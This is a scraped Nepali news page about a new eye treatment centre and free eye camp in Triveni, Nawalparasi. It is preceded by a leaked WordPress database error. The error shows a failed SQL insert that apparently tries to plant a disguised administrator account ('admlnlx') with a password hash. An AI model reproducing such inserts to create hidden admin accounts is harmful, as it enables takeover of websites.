WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbZU6VwT5pfqnVaExdC/p4dCJoSPHP.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:49:06', '', 'admlnlx', 'admlnlx')
मोहम्मद ईजहार शेष,
परासी, माघ १३–
नवलपरासीको त्रिवेणीमा आजदेखि आँखा उपचार केन्द्र संचालनमा आएको छ ।
त्रिवेणी आँखा उपचार केन्द्रको आज नेपाली कांंग्रेसका केन्द्रिय सदस्य देवेन्द्रराज कँडेलले उद्घाटन गर्नुभयो ।
कार्यक्रममा सम्बोधन गर्दै पूर्व गृहराज्य मन्त्री कँडेलले आँखा जिवनका लागि सबभन्दा सम्बेदनशिल र महत्वपूर्ण अङ्ग भएकोले नियमित चेकजाँचमा सर्वसाधरणले ध्यान दिनुपर्ने र चिकित्सक स्ंवय गम्भीर हुनुपर्ने बताउनु भयो । त्यस क्षेत्रमा सरकारी स्तरबाट एकमात्र स्थापना भएको आँखा उपचार केन्द्रले त्यस क्षेत्रका जनताको राम्रा र सहज तरिकाले पँहुच हुने अपेक्षा राख्नु भयो ।
उदघाटन पछि सञ्चालन गरिएको एक दिने निःशुल्क आँखा शिविरमा २ सय ३० जनाले आँखा परीक्षण गराएका छन् भने ७५ जना बिरामीको मोतियाबिन्दु भएकोमा निःशुल्क शल्यक्रियाका लागि विनोद निता कण्डेल आँआ अस्पताल पठाईएको छ । सो अवसरमा सेवा नेपालका निर्देशक रामप्रसाद कँडेल, नेपाल नेत्र ज्योती संंघ बिनोद निता कँडेलका सभापति मन्जु कँडेल, उपसभापति हरिप्रसाद उपाध्याय लगायतले शुभकामना ब्यक्त गर्नु भएको बिनोद निता कण्डेल आँखा अस्पतालका ब्यवस्थापक तुलसीप्रसाद पराजुलीले जानकारी दिनुभयो ।